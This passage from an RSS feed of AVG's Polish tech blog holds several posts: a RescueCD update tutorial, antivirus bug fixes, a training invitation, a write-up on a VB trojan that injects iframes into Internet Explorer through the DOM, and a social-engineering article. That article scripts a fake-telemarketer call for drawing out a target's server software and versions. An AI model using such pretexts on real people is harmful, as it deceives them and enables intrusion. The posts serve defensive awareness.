<p>Jeśli na aktualizację się zgodziliśmy to trzeba wybrać sposób jej wykonania</p>
<p><a href="http://techblog.avg.pl/wp-content/uploads/2011/06/SnapShot_110621_135924.png"><img class="alignnone size-medium wp-image-569" title="Update2" src="http://techblog.avg.pl/wp-content/uploads/2011/06/SnapShot_110621_135924-300x239.png" alt="" width="300" height="239" /></a></p>
<ul>
<li>Online &#8211; pobiera automatycznie aktualizację z serwerów AVG i instaluje ją do użycia w RescueCD.</li>
<li>Offline &#8211; pozwala na aktualizację z dysku twardego komputera lub z nośnika USB, na których mamy wcześniej pobrane pliki aktualizacji.</li>
<li>Download &#8211; pobranie plików aktualizacji bez ich instalowania w bieżącej sesji.</li>
</ul>
<p>Po wybraniu Online pojawi się dodatkowa opcja wyboru, którego poziomu aktualizacje mają zostać pobrane</p>
<p><a href="http://techblog.avg.pl/wp-content/uploads/2011/06/SnapShot_110621_135939.png"><img class="alignnone size-medium wp-image-570" title="Update3" src="http://techblog.avg.pl/wp-content/uploads/2011/06/SnapShot_110621_135939-300x239.png" alt="" width="300" height="239" /></a></p>
<ul>
<li>priority 2 &#8211; Aktualizacja baz sygnatur (zalecany)</li>
<li>priority 3 &#8211; aktualizacja komponentów programu</li>
<li>priority 4 &#8211; aktualizacje opcjonalne &#8211; przydatne tylko w przypadku pobierania aktualizacji w trybie Download</li>
</ul>
<p>Syslinux wykona polecenie avgupdate -b &#8211;priority # o wybranym przez nas poziomie aktualizacji. Pojawi się podgląd postępu pobierania i po zakończeniu informacja o zakończeniu aktualizacji. Wciskamy dowolny klawisz i wracamy do okna głównego.</p>
<p><a href="http://techblog.avg.pl/wp-content/uploads/2011/06/SnapShot_110621_140048.png"><img class="alignnone size-medium wp-image-571" title="Update4" src="http://techblog.avg.pl/wp-content/uploads/2011/06/SnapShot_110621_140048-300x239.png" alt="" width="300" height="239" /></a></p>
<p>Pojawi się jeszcze potwierdzenie, że aktualizację zakończono pomyślnie.</p>
<p><a href="http://techblog.avg.pl/wp-content/uploads/2011/06/SnapShot_110621_140053.png"><img class="alignnone size-medium wp-image-572" title="Update5" src="http://techblog.avg.pl/wp-content/uploads/2011/06/SnapShot_110621_140053-300x239.png" alt="" width="300" height="239" /></a></p>
<p>Po zakończeniu aktualizacji automatycznie rozpocznie się skanowanie wybrane przez nas wcześniej, a jeśli aktualizacja była tylko uruchamiana z menu to wrócimy do głównego okna programu.</p>
<p>W najbliższych dniach część 3 &#8211; analiza wyników skanowania, leczenie/usuwanie wykrytych zagrożeń, zarządzanie kwarantanną systemu lokalnego.</p>
<p>Część 4 &#8211; narzędzia dodatkowe w RescueCD &#8211; Midnight Commander, TestDisk, File Recovery, edytor rejestru Windows.</p>
<p>Część 5 &#8211; RescueCD do naprawy unieruchomionego Windows na przykładach.</p>
<img src="http://feeds.feedburner.com/~r/techblog-avg-pl/~4/1QEqWt8dMl4" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://techblog.avg.pl/index.php/2011/06/avg-rescue-cd-czesc-2/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<feedburner:origLink>http://techblog.avg.pl/index.php/2011/06/avg-rescue-cd-czesc-2/</feedburner:origLink></item>
		<item>
		<title>Social engineering</title>
		<link>http://feeds.avg.pl/~r/techblog-avg-pl/~3/aywCbxX9neE/</link>
		<comments>http://techblog.avg.pl/index.php/2011/05/social-engineering/#comments</comments>
		<pubDate>Tue, 31 May 2011 10:15:32 +0000</pubDate>
		<dc:creator>Arek Zakrzewski</dc:creator>
				<category><![CDATA[Bezpieczeństwo]]></category>
		<category><![CDATA[cracker]]></category>
		<category><![CDATA[Social engineering]]></category>
		<category><![CDATA[socjotechnika]]></category>
		<category><![CDATA[wyłudzenie]]></category>
		<category><![CDATA[włamanie]]></category>

		<guid isPermaLink="false">http://techblog.avg.pl/?p=552</guid>
		<description><![CDATA[Zacząć trzeba od samej definicji social engineeringu. Pierwsza definicja to ta najłatwiej przyswajalna: SOCIAL ENGINEERING &#8211; The clever manipulation of the natural human tendency to trust. INŻYNIERA SOCIALNA &#8211; sprytne manipulowanie naturalną tendencją człowieka do zaufania. Wikipedia również bardzo ładnie definiuje: Inżynieria społeczna, inżynieria socjalna, socjotechnika — w bezpieczeństwie teleinformatycznym zestaw metod mających na celu [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-557" title="SE" src="http://techblog.avg.pl/wp-content/uploads/2011/05/9305967-social-security-card-in-hacker-s-hand-identity-theft.jpg" alt="" width="198" height="133" />Zacząć trzeba od samej definicji social engineeringu.</p>
<p>Pierwsza definicja to ta najłatwiej przyswajalna:</p>
<h4>SOCIAL ENGINEERING &#8211; The clever manipulation of the natural human tendency to trust.</h4>
<h4>INŻYNIERA SOCIALNA &#8211; sprytne manipulowanie naturalną tendencją człowieka do zaufania.</h4>
<p>Wikipedia również bardzo ładnie definiuje:</p>
<p><a title="Social Engineering" href="http://pl.wikipedia.org/wiki/In%C5%BCynieria_spo%C5%82eczna_%28informatyka%29" target="_blank" onclick="pageTracker._trackPageview('/outgoing/pl.wikipedia.org/wiki/In_C5_BCynieria_spo_C5_82eczna_28informatyka_29?referer=');"><strong>Inżynieria społeczna</strong>, <strong>inżynieria socjalna</strong>, <strong>socjotechnika</strong></a> — w <a title="Bezpieczeństwo teleinformatyczne" href="http://pl.wikipedia.org/wiki/Bezpiecze%C5%84stwo_teleinformatyczne" onclick="pageTracker._trackPageview('/outgoing/pl.wikipedia.org/wiki/Bezpiecze_C5_84stwo_teleinformatyczne?referer=');">bezpieczeństwie teleinformatycznym</a> zestaw metod mających na celu uzyskanie niejawnych informacji przez cyberprzestępcę. Crackerzy często wykorzystują niewiedzę bądź łatwowierność użytkowników systemów  informatycznych, aby pokonać zabezpieczenia odporne na wszelkie formy  ataku. Wyszukują przy tym najsłabszy punkt systemu bezpieczeństwa,  którym najczęściej jest człowiek.</p>
<p><span id="more-552"></span>Odwiedźcie podlinkowany artykuł na wiki i doczytajcie więcej.</p>
<p>Ideą socjotechnik jest zdobycie maksimum interesujących nas informacji np. danych o konfiguracji sieci, używanych systemach, ich wersjach i wszystkim co może pomóc w potencjalnym włamaniu. Specjaliści od Social engineeringu to ludzie, którzy potrafią perfekcyjnie manipulować rozmówcą, dobierać argumenty i sformułowania, które naszego rozmówcę zdekoncentrują. Pytając o sprawy z pozoru błahe i nieistotne, chwaląc rozmówcę za np. udzieloną wcześniej pomoc czy w dowolny inny sposób zdobywając jak największe zaufanie osoby po drugiej stronie, mając zaufanie lub zdobytą uwagę &#8211; czymś zainteresowaliśmy naszego słuchacza i daje się wciągnąć w dyskusję &#8211; dochodzimy do etapu pytań właściwych, z których informacje są dla nas przydatne.</p>
<p>Jedną z najpopularniejszych metod socjotechnicznych jest <strong>metoda na telemarketera</strong>.</p>
<p>Dzwonimy do naszej potencjalnej ofiary, przedstawiamy się jako pan X.Y z firmy zzz, która produkuje jakieś tam super świetne rozwiązanie zabezpieczające np. antywirusa na serwery Linux. Mamy spore szanse zaintrygować naszego potencjalnego rozmówcę pod warunkiem, że uda nam się błyskawicznie zatrzymać go przy słuchawce dobrym argumentem. Tu najczęściej padają stwierdzenia:</p>
<p><em>- oprogramowanie jest bardzo atrakcyjne cenowo proszę tylko posłuchać co oferujemy</em></p>
<p><em>- produkt ma wysoką skuteczność potwierdzoną w testach i do tego świetną cenę</em></p>
<p><em>- lub analogiczne sformułowania, które przyciągają rozmówcę najłatwiejszym wabikiem &#8211; pieniądz. Dajemy rozmówcy pozór, że oszczędzi wybierając nasze rozwiązanie.</em></p>
<p>Jeśli udało nam się zwabić rozmówcę i chce nas wysłuchać to pora na manipulację. Zaczynamy od opowiedzenia szybko i zwięźle żeby człowieka nie zanudzić, ze program potrafi między innymi: tu podajemy kilka bardzo dobrych argumentów, które spotęgują ciekawość rozmówcy, że faktycznie to może być coś ciekawego. Jeśli dalej mamy szczęście to rozmówca nas słucha, a więc używamy naszego wabika &#8211; pieniędzy i tym samym ruszamy do ataku.</p>
<p><em>- Wie Pan program jest modularny i można dowolnie dobrać składniki aby uzyskać jak najlepszą funkcjonalność w najlepszej cenie. Mogę wycenę dla Pana przygotować tylko proszę podać mi: na jakim systemie będziemy produkt instalować, co będziemy zabezpieczać &#8211; serwer plików, poczty, bazodanowy, www &#8211; na przykład serwer bazodanowy.</em></p>
<p>Proszę zatem podać mi jakiego typu baz danych Pan używa żebym mógł potwierdzić, że takie rozwiązanie wspieramy &#8211; pada np. MySQL i Firebird,- proszę jeszcze podać mi wersje silników &#8211; MySQL 5, Firebird 2.1.2.</p>
<p>Klient zainteresowany zakupami podał nam na tacy system z jakiego korzysta serwer, co ten serwer robi i jakiej wersji oprogramowania używa. Skoro wyciągnęliśmy z rozmówcy co chcieliśmy to pora na odwet. Metody wyjścia z telemarketera mamy dwie:</p>
<p>- dokańczamy rozmowę:</p>
<p><em>podajemy cenę, która jest niestrawna dla nikogo i klient odpowie, że nie jest zainteresowany,</em></p>
<p><em>podajemy cenę, która jest atrakcyjna, bierzemy adres e-mail dla utrzymania wiarygodności całego procesu i obiecujemy przesłać ofertę mailem</em></p>
<p>- wycofujemy się natychmiast</p>
<p><em>przykro mi używanego przez Pana środowiska (cokolwiek by to nie było) nie wspieramy. Nasz produkt obsługuje tylko&#8230;. wymieniamy alternatywne rozwiązania. Dziękujemy ładnie za poświęcony czas i żegnamy się.</em></p>
<p>Którejkolwiek drogi byśmy nie wybrali zdobyliśmy to co nas interesowało.</p>
<p>Kolejna opcja socjotechniki zakłada zmuszenie naszego rozmówcy do interakcji z plikiem, linkiem do strony www. Popularny scenariusz to &#8222;<strong>na niezadowolonego klienta</strong>&#8222;. Dostałem od was fakturę/dokument/plik którego nie mogę otworzyć. Odsyłam go w załączniku i proszę sprawdzić.</p>
<p>Choć wydaje się to dość trywialne i szyte grubymi nićmi to socjotechniki naprawdę działają. Problemem jest ludzka ciekawość, naiwność i pogoń za pieniądzem. Tam, gdzie pojawi się widmo oszczędzenia kilku groszy jest spora szansa zdobycia zainteresowania &#8211; nie powiedzie się tylko jeśli trafimy na osobę kompetentną, która np. jest przywiązana do obecnie używanego systemu czy innego &#8222;towaru&#8221;, który oferujemy.</p>
<p>Jeśli kogoś temat zainteresował to serdecznie polecam lekturę Kevina Mitnicka &#8222;Sztuka podstępu. Łamałem ludzi nie hasła.&#8221; Mitnick to jeden z najbardziej doświadczonych socjotechników światka informatycznego. W swojej książce opisuje wiele ciekawych przykładów jak łatwo jest manipulować ludźmi dobierając odpowiednie argumenty i stosując odpowiedni wabik.</p>
<p>Na koniec zaś. Social Engineering to nie tylko branża IT. Socjotechnika jest wszędzie, nawet w naszym codziennym życiu. Tu macie przykład z tureckiej policji:</p>
<p><a href="http://niebezpiecznik.pl/post/turecka-policja-przebrana-za-lekarzy-ciekawy-eksperyment/" target="_blank" onclick="pageTracker._trackPageview('/outgoing/niebezpiecznik.pl/post/turecka-policja-przebrana-za-lekarzy-ciekawy-eksperyment/?referer=');">http://niebezpiecznik.pl/post/turecka-policja-przebrana-za-lekarzy-ciekawy-eksperyment/</a></p>
<img src="http://feeds.feedburner.com/~r/techblog-avg-pl/~4/aywCbxX9neE" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://techblog.avg.pl/index.php/2011/05/social-engineering/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://techblog.avg.pl/index.php/2011/05/social-engineering/</feedburner:origLink></item>
		<item>
		<title>Kolejna metoda ataku z fałszywą witryną</title>
		<link>http://feeds.avg.pl/~r/techblog-avg-pl/~3/6oA03QsunrY/</link>
		<comments>http://techblog.avg.pl/index.php/2011/05/kolejna-metoda-ataku-z-falszywa-witryna/#comments</comments>
		<pubDate>Fri, 20 May 2011 10:14:44 +0000</pubDate>
		<dc:creator>Arek Zakrzewski</dc:creator>
				<category><![CDATA[Bezpieczeństwo]]></category>
		<category><![CDATA[ARP]]></category>
		<category><![CDATA[DOM]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[iframe]]></category>
		<category><![CDATA[Internet Explorer]]></category>
		<category><![CDATA[malware]]></category>

		<guid isPermaLink="false">http://techblog.avg.pl/?p=542</guid>
		<description><![CDATA[Z reguły w przypadkach ataków na strony internetowe, które objawiają się pojawianiem się dodatkowych treści mamy do czynienia z skryptem, który dodaje dodatkową treść albo podejrzewamy arp spoof, który podstawia nam w całości fałszywą witrynę. Technicy laboratorium AVG wykryli kolejną metodę ataku. Malware, które wykorzystuje zupełnie odmienny sposób na dodanie fałszywej treści do witryny. Domyślny [...]]]></description>
			<content:encoded><![CDATA[<p>Z reguły w przypadkach ataków na strony internetowe, które objawiają się pojawianiem się dodatkowych treści mamy do czynienia z skryptem, który dodaje dodatkową treść albo podejrzewamy arp spoof, który podstawia nam w całości fałszywą witrynę. Technicy laboratorium AVG wykryli kolejną metodę ataku. Malware, które wykorzystuje zupełnie odmienny sposób na dodanie fałszywej treści do witryny.</p>
<p><span id="more-542"></span>Domyślny widok google.com:</p>
<p><img class="alignnone size-full wp-image-543" src="http://techblog.avg.pl/wp-content/uploads/2011/05/6a00e5539a10418834014e883ef06c970d-500wi.png" alt="" width="500" height="315" /></p>
<p>i tuż po użyciu malware:</p>
<p><img class="alignnone size-full wp-image-544" src="http://techblog.avg.pl/wp-content/uploads/2011/05/6a00e5539a104188340154321e58e3970c-500wi.png" alt="" width="500" height="295" /></p>
<p>Wygląda zupełnie jak ramka wstawiona w kod witryny google.com. Analizując źródło strony nie ma w kodzie nic niezwykłego więc to na pewno nie frame injection. Wiemy też na pewno, że Google nie zostały zhakowane i nie ma ARP spoofa w naszej testowej sieci.</p>
<p>Skąd więc owa ramka się wzięła? Po dogłębnej analizie wykryto, że wykorzystywany jest obiekt  ‘InternetExplorer’.  Czym jest zatem obiekt InternetExplorer? Jest to funkcja wstawienia instancji Internet Explorera w kod dowolnej aplikacji napisanej w Visual Basic.</p>
<p>Jak wspomniałem malware powstało w VB, tu macie przykład jak taki obiekt w VB wstawić:</p>
<p><em>Dim IE As SHDocVw.InternetExplorer</em></p>
<p><em>Set IE = CreateObject(&#8222;InternetExplorer.Application&#8221;)</em></p>
<p>Malware sprawdza wszystkie uruchomione procesy iexplore.exe i odczytuje wartość opcji ‘FullName’. Jeśli jest  ‘IExplorer.exe’ malware próbuje wstawić się przed wywołanie funkcji ‘BeforeNavigate’, ’OnVisible’ lub podobnych więc jeśli IE wykona przejętą funkcję to uruchomiony zostanie kod malware.</p>
<p>Modyfikacja przejmowanej funkcji dotyczy sprawdzenia URL docelowego i wstawienia fałszywego. Po pierwsze sprawdzane jest czy URL jest adresem fałszywym czyli kod został już wykonany czy nowy proces ma jeszcze zamiast URL ustawiony ‘About:Blank’. Po drugie sprawdzany jest status funkcji ‘ReadyState’ żeby zweryfikować czy strona została już w całości załadowana. Po trzecie następuje przejęcie obiektu DOM  (Document Object Model) i wstawienie kodu iframe . Z racji tego, że kod iframe jest wstawiany przez obiekt DOM, to nie widać kodu iframe w źródle witryny. W testowanym przypadku docelowy URL, do którego prowadził wstawiony jako DOM kod jest już zablokowany i niedostępny dlatego wstawiony na screenie wyżej iframe zwrócił ‘Page not found’.</p>
<p>Sprawdzenie URL:</p>
<p><img class="alignnone size-full wp-image-545" src="http://techblog.avg.pl/wp-content/uploads/2011/05/6a00e5539a104188340154321e593a970c-500wi.png" alt="" width="500" height="101" /></p>
<p>Sprawdzenie stanu ReadyState:</p>
<p><img class="alignnone size-full wp-image-546" src="http://techblog.avg.pl/wp-content/uploads/2011/05/6a00e5539a1041883401538e4b76fa970b-500wi.png" alt="" width="500" height="116" /></p>
<p>Kod wstawianego obiektu DOM:</p>
<p><img class="alignnone size-full wp-image-547" src="http://techblog.avg.pl/wp-content/uploads/2011/05/6a00e5539a104188340154321e59f7970c-500wi.png" alt="" width="500" height="220" /></p>
<p>Póki co detekcja tego typu infekcji przez antywirusy jest niska. AVG wykrywa tego typu infekcję jako Trojan VB.AMTX</p>
<img src="http://feeds.feedburner.com/~r/techblog-avg-pl/~4/6oA03QsunrY" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://techblog.avg.pl/index.php/2011/05/kolejna-metoda-ataku-z-falszywa-witryna/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<feedburner:origLink>http://techblog.avg.pl/index.php/2011/05/kolejna-metoda-ataku-z-falszywa-witryna/</feedburner:origLink></item>
		<item>
		<title>Naprawa błędu avgwdsvc.exe w AVG 9.0.</title>
		<link>http://feeds.avg.pl/~r/techblog-avg-pl/~3/Fjc98bAh68Q/</link>
		<comments>http://techblog.avg.pl/index.php/2011/05/naprawa-bledu-avgwdsvc-w-avg-90/#comments</comments>
		<pubDate>Mon, 16 May 2011 12:36:25 +0000</pubDate>
		<dc:creator>Arek Zakrzewski</dc:creator>
				<category><![CDATA[Nowości]]></category>
		<category><![CDATA[Aktualizacja]]></category>
		<category><![CDATA[błąd]]></category>
		<category><![CDATA[naprawa]]></category>

		<guid isPermaLink="false">http://techblog.avg.pl/?p=537</guid>
		<description><![CDATA[Problem, o którym uprzedzałem w ubiegłym tygodniu w tym wpisie: Błąd avgwdsvc.exe na Windows XP przy AVG9 został już rozwiązany. Udostępniona została aktualizacja AVG 9.0.901, która eliminuje problem składnika AVG WatchDog avgwdsvc.exe. Aktualizacja tak jak wersja 9.0.900 jest dostępna w ramach aktualizacji automatycznej i powinna się zainstalować zgodnie z harmonogramem aktualizacji. Jeśli jednak nadal korzystacie [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-538" title="fixed" src="http://techblog.avg.pl/wp-content/uploads/2011/05/service_repair.gif" alt="" width="48" height="48" />Problem, o którym uprzedzałem w ubiegłym tygodniu w tym wpisie: <a href="http://techblog.avg.pl/index.php/2011/05/blad-avgwdsvc-exe-na-windows-xp-przy-avg9/" target="_blank">Błąd avgwdsvc.exe na Windows XP przy AVG9</a> został już rozwiązany.</p>
<p>Udostępniona została aktualizacja AVG 9.0.901, która eliminuje problem składnika AVG WatchDog avgwdsvc.exe. Aktualizacja tak jak wersja 9.0.900 jest dostępna w ramach aktualizacji automatycznej i powinna się zainstalować zgodnie z harmonogramem aktualizacji. Jeśli jednak nadal korzystacie z wersji 900 to proszę w oknie głównym AVG kliknąć przycisk Aktualizuj teraz i potwierdzić aktualizację komponentów programu.</p>
<p>Jeśli ktoś miałby nadal problem na wersji AVG 9.0.901 to proszę AVG 9 odinstalować i jak radziłem wcześniej skorzystać z możliwości migracji do wersji 2011. W sytuacjach gdy wersja 9.0 musi być używana nadal np. na Windows 2000 AVG odinstalowujemy, instalujemy ponownie z pakietu instalacyjnego 894 dostępnego na: <a href="http://www.avg.com/pl-pl/download-9" target="_blank" onclick="pageTracker._trackPageview('/outgoing/www.avg.com/pl-pl/download-9?referer=');">http://www.avg.com/pl-pl/download-9</a> i wykonujemy aktualizację programu. Wadliwa wersja 900 zostanie pominięta i program od razu uaktualni się do poprawnej wersji 9.0.901.</p>
<p>W razie problemów z avgwdsvc w wersji 9.0.901 zgłoście proszę problem na pomoc@avg.pl.</p>
<img src="http://feeds.feedburner.com/~r/techblog-avg-pl/~4/Fjc98bAh68Q" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://techblog.avg.pl/index.php/2011/05/naprawa-bledu-avgwdsvc-w-avg-90/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://techblog.avg.pl/index.php/2011/05/naprawa-bledu-avgwdsvc-w-avg-90/</feedburner:origLink></item>
		<item>
		<title>Zapraszamy na darmowe szkolenia o sieciach i bezpieczeństwie</title>
		<link>http://feeds.avg.pl/~r/techblog-avg-pl/~3/zcbVnuOEAaY/</link>
		<comments>http://techblog.avg.pl/index.php/2011/05/zapraszamy-na-darmowe-szkolenia-o-sieciach-i-bezpieczenstwie/#comments</comments>
		<pubDate>Tue, 10 May 2011 12:58:21 +0000</pubDate>
		<dc:creator>Arek Zakrzewski</dc:creator>
				<category><![CDATA[Bezpieczeństwo]]></category>

		<guid isPermaLink="false">http://techblog.avg.pl/?p=526</guid>
		<description><![CDATA[Darmowe szkolenia o sieciach i bezpieczeństwie Białystok, Kraków, Lublin, Olsztyn, Rzeszów (16 – 20 maja 2011) Chciałbym zaprosić na wyjątkowe, bezpłatne szkolenia, które organizujemy wraz z firmą Axence – producentem programu do monitorowania i zarządzania komputerami w firmach i instytucjach. Zagadnienia omawiane podczas szkoleń: ataki na komputery w sieci firmowej z wykorzystaniem technik Social Engineering; [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Darmowe szkolenia o sieciach i bezpieczeństwie</strong></p>
<p>Białystok, Kraków, Lublin, Olsztyn, Rzeszów (16 – 20 maja 2011)</p>
<p>Chciałbym zaprosić na wyjątkowe, bezpłatne szkolenia, które organizujemy wraz z firmą <a href="http://www.axence.com/" target="_blank" onclick="pageTracker._trackPageview('/outgoing/www.axence.com/?referer=');">Axence</a> – producentem programu do monitorowania i zarządzania komputerami w firmach i instytucjach.</p>
<p>Zagadnienia omawiane podczas szkoleń:</p>
<ul>
<li> ataki na komputery w sieci firmowej z wykorzystaniem technik Social Engineering;</li>
<li> przykład infekcji komputera poprzez pozornie nieszkodliwy plik PDF;</li>
<li> jak się bronić – bezpieczeństwo sieciowe i zabezpieczenia antywirusowe;</li>
<li> mapowanie i proaktywne monitorowanie sieci; optymalna konfiguracja alarmów, akcji korekcyjnych i raportów;</li>
<li> monitoring parametrów środowiskowych serwerowni (pokaz praktyczny na przykładowych czujnikach);</li>
<li> inwentaryzacja sprzętu i oprogramowania (audyty legalności); efektywne zarządzanie licencjami;</li>
<li> ewidencjonowanie majątku IT za pomocą modułu administracyjno-rozliczeniowego (tzw. Środki Trwałe);</li>
<li> inteligentne monitorowanie pracowników; monitorowanie odwiedzanych stron WWW i ich blokowanie;</li>
<li> monitorowanie wiadomości e-mailowych; monitorowanie i raporty kosztów wydruków;</li>
<li> zdalna pomoc techniczna dla użytkowników (remote access) z bazą zgłoszeń i czatem;</li>
<li> ochrona danych przed wyciekiem (zarządzanie urządzeniami przenośnymi oraz portami);</li>
<li> ochrona przed szkodliwym oprogramowaniem przenoszonym na nośnikach danych (blokowanie portów i nośników);</li>
</ul>
<p><span style="text-decoration: underline;">Terminy i miejsca szkoleń:</span></p>
<ol>
<li>16.05.2011: Olsztyn, Hotel Warmiński, ul. Kołobrzeska 1, Sala Dębowa</li>
<li>17.05.2011: Białystok, Best Western Hotel Cristal, Lipowa 3/5, Sala nr 1</li>
<li>18.05.2011: Lublin, Hotel-Restauracja „Lwów”, ul. Bronowicka 2, Sala Kolumnowa</li>
<li>19.05.2011: Rzeszów, Icam House Hotel, Al. T. Rejtana 1, Sala Grecka</li>
<li>20.05.2011: Kraków, Hotel Atrium, ul. Krzywa 7, Sala Konferencyjna</li>
</ol>
<p><a href="http://www.axencesoftware.com/rejestracja/" target="_blank" onclick="pageTracker._trackPageview('/outgoing/www.axencesoftware.com/rejestracja/?referer=');">&gt;&gt; Zarejestruj się za darmo już teraz</a></p>
<p>Kontakt w sprawie rejestracji: Dawid Spałek, biuro@avg.pl</p>
<p><span style="text-decoration: underline;">Upominki dla uczestników:</span></p>
<p>Każdy uczestnik otrzyma:</p>
<ul>
<li> 3-miesięczną wersję AVG Internet Security Business Edition 2011 (na 10 stanowisk);</li>
<li> bezterminową i w pełni funkcjonalną licencję Axence NetTools 4.0 (rozbudowany zestaw narzędzi do skanowania, monitorowania i administrowania sieciami, z bardzo intuicyjnym interfejsem użytkownika);</li>
<li> imienny certyfikat;</li>
</ul>
<p>oraz weźmie udział w losowaniu:</p>
<ul>
<li> komercyjnych licencji AVG Internet Security 2011 (na 1 stanowisko, na 1 rok);</li>
<li> upominków ufundowanych przez Axence;</li>
</ul>
<p>AGENDA szkoleń</p>
<ol>
<li>08:30 	Rejestracja i przywitanie uczestników przy porannej kawie.</li>
<li>09:00 	Współczesne zagrożenia w sieci. IT Security to nie wszystko – jest jeszcze Social Engineering. Symulacja ataku na komputer w sieci firmowej z wykorzystaniem technik Social Engineering – jak się obronić? Wykład prowadzi ekspert firmy CORE – Dystrybutora AVG w Polsce.</li>
<li>09:45 	Wprowadzenie do Axence nVision 5.5. Omówienie przeznaczenia i funkcjonalności, korzyści informatycznych i biznesowych oraz licencjonowania programu i nowości w wersji 5.5. Prezentację prowadzi ekspert Axence.</li>
<li>10:45 	Przerwa kawowa.</li>
<li>11:15 	Pokaz praktyczny Axence nVision 5 połączony z indywidualnymi konsultacjami. (I) Instalacja, wdrożenie i optymalna konfiguracja programu oraz jego praktyczne wykorzystanie do rozwiązywania najczęściej spotykanych problemów sieciowych. Wprowadzenie do inwentaryzacji oprogramowania i audytów legalności ze szczególnym naciskiem na politykę licencjonowania Microsoft.</li>
<li>12:15 	Przerwa.</li>
<li>12:30 	Pokaz praktyczny Axence nVision 5 połączony z indywidualnymi konsultacjami. (II) Instalacja, wdrożenie i optymalna konfiguracja programu oraz jego praktyczne wykorzystanie do rozwiązywania najczęściej spotykanych problemów sieciowych.</li>
<li>13:30 	Przerwa kawowo-kanapkowa.</li>
<li>14:00 	Implementacja AVG Internet Security Business Edition 2011. Pokaz praktyczny szybkiej konfiguracji w środowisku sieciowym.</li>
<li>15:15 	Losowanie upominków i wręczenie certyfikatów. Zakończenie.</li>
</ol>
<p>Jeszcze raz zapraszam!</p>
<img src="http://feeds.feedburner.com/~r/techblog-avg-pl/~4/zcbVnuOEAaY" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://techblog.avg.pl/index.php/2011/05/zapraszamy-na-darmowe-szkolenia-o-sieciach-i-bezpieczenstwie/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<feedburner:origLink>http://techblog.avg.pl/index.php/2011/05/zapraszamy-na-darmowe-szkolenia-o-sieciach-i-bezpieczenstwie/</feedburner:origLink></item>
		<item>
		<title>Błąd avgwdsvc.exe na Windows XP przy AVG9</title>
		<link>http://feeds.avg.pl/~r/techblog-avg-pl/~3/LUOT0vLMOQo/</link>
		<comments>http://techblog.avg.pl/index.php/2011/05/blad-avgwdsvc-exe-na-windows-xp-przy-avg9/#comments</comments>
		<pubDate>Tue, 10 May 2011 10:38:47 +0000</pubDate>
		<dc:creator>Arek Zakrzewski</dc:creator>
				<category><![CDATA[Bezpieczeństwo]]></category>

		<guid isPermaLink="false">http://techblog.avg.pl/?p=507</guid>
		<description><![CDATA[Od wczoraj otrzymujemy bardzo dużo zgłoszeń dotyczących AVG9 zainstalowanego na Windows XP (dla innych systemów zgłoszeń jeszcze nie otrzymaliśmy). Zgłaszany problem ma związek z ostatnią aktualizacją AVG9 do wersji 9.0.900. Problem dotyczy modułu AVG dla przeglądarki Firefox. Niestety problem dotyczy prawie wszystkich użytkowników AVG9, analiza szczegółów na podstawie zebranych danych trwa i nie jestem w [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-508" title="err" src="http://techblog.avg.pl/wp-content/uploads/2011/05/err.png" alt="" width="48" height="48" />Od wczoraj otrzymujemy bardzo dużo zgłoszeń dotyczących AVG9 zainstalowanego na Windows XP (dla innych systemów zgłoszeń jeszcze nie otrzymaliśmy). Zgłaszany problem ma związek z ostatnią aktualizacją AVG9 do wersji 9.0.900.</p>
<p>Problem dotyczy modułu AVG dla przeglądarki Firefox.<br />
Niestety problem dotyczy prawie wszystkich użytkowników AVG9, analiza szczegółów na podstawie zebranych danych trwa i nie jestem w stanie określić kiedy udostępniona zostanie aktualizacja dla AVG9, która ten problem eliminuje.</p>
<p>Aby problemu pozbyć się już teraz zalecane jest odinstalowanie wersji AVG 9, w razie problemów z usuwaniem używamy AVG Remover:</p>
<p>Dla AVG 9.0:</p>
<p>Dla systemów 32bit:<br />
<a href="http://pliki.avg.pl/filedir/util/avg_arm_sup_____.dir/avgremover.exe" target="_blank" onclick="pageTracker._trackPageview('/outgoing/pliki.avg.pl/filedir/util/avg_arm_sup_.dir/avgremover.exe?referer=');">http://pliki.avg.pl/filedir/util/avg_arm_sup_____.dir/avgremover.exe</a></p>
<p>Dla systemów 64bit:<br />
<a href="http://pliki.avg.pl/filedir/util/avg_arv_sup_____.dir/avgremoverx64.exe" target="_blank" onclick="pageTracker._trackPageview('/outgoing/pliki.avg.pl/filedir/util/avg_arv_sup_.dir/avgremoverx64.exe?referer=');">http://pliki.avg.pl/filedir/util/avg_arv_sup_____.dir/avgremoverx64.exe</a></p>
<p>i zainstalowanie ze swoim numerem licencji wersji AVG 2011 dostępnej do pobrania na <a href="http://www.avg.pl/pobierz" target="_blank" onclick="pageTracker._trackPageview('/outgoing/www.avg.pl/pobierz?referer=');">www.avg.pl/pobierz</a><br />
Wszyscy posiadacze licencji na produkty AVG mają pełne prawo ze swoim numerem licencji instalować nowszą wersję jaka jest dostępna.</p>
<p>Użytkownicy wersji Free po prostu ją odinstalowują i instalują nową wersję darmową &#8211; AVG Free 2011. Numer licencji dla instalacji wersji Free jest zawarty w pakiecie instalacyjnym.</p>
<p>To na obecną chwilę najpewniejsze rozwiązanie, które wyklucza problem.</p>
<p>Komunikat o błędzie jest generowany przez system Windows:</p>
<p><img class="alignnone size-full wp-image-509" title="avgwdsvc" src="http://techblog.avg.pl/wp-content/uploads/2011/05/avgwdsvc.png" alt="" width="486" height="264" /></p>
<img src="http://feeds.feedburner.com/~r/techblog-avg-pl/~4/LUOT0vLMOQo" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://techblog.avg.pl/index.php/2011/05/blad-avgwdsvc-exe-na-windows-xp-przy-avg9/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
